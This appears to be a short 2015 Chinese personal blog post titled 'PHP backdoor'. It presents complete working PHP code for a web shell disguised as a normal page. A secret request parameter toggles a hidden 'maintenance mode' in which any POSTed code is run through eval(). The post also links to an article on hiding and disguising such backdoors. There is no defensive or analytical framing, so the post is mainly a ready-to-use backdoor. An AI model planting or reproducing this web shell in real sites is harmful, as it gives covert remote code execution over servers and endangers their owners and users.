WEB、技术

PHP 后门

2015年5月16日 huangwc 发表回复

backdoor

<?php
@session_start();

// 进入/退出维护模式
if(isset($_REQUEST['secret']) &&  $_REQUEST['secret'] == '{THE_BACKDOOR_SECRET}') {
    if(isset($_SESSION['mode'])) unset($_SESSION['mode']);
    else $_SESSION['mode'] = 'maintenance';
    header("Location: {$_SERVER["PHP_SELF"]}");
    exit();
} 
// 维护模式内的逻辑
elseif(isset($_SESSION['mode']) && $_SESSION['mode'] == 'maintenance') {
    if(isset($_POST['exec'])) {
        eval($_POST['exec']);
    } else {?>
    <h1>维护模式</h1>
    <form method="post" target="result">
        <textarea name="exec"></textarea>
        <input type="submit" />
    </form>
    <iframe id="result" name="result" width="800" height="600"></iframe>
    <?php }
    exit();
}

// 非维护模式的正常展现
?><!DOCTYPE html>
<html>
    <head>
        <title>功能页面</title>
    </head>
    <body>
        <h1>这是一个正常的页面</h1>
    </body>
</html>

如何隐藏伪装：http://www.freebuf.com/articles/web/33824.html

【转载请附】愿以此功德，回向 >>

原文链接：http://www.huangwenchao.com.cn/2015/05/php-backdoor.html【PHP 后门】

发表评论取消回复

——Alfred Huang (黄文超)的个人空间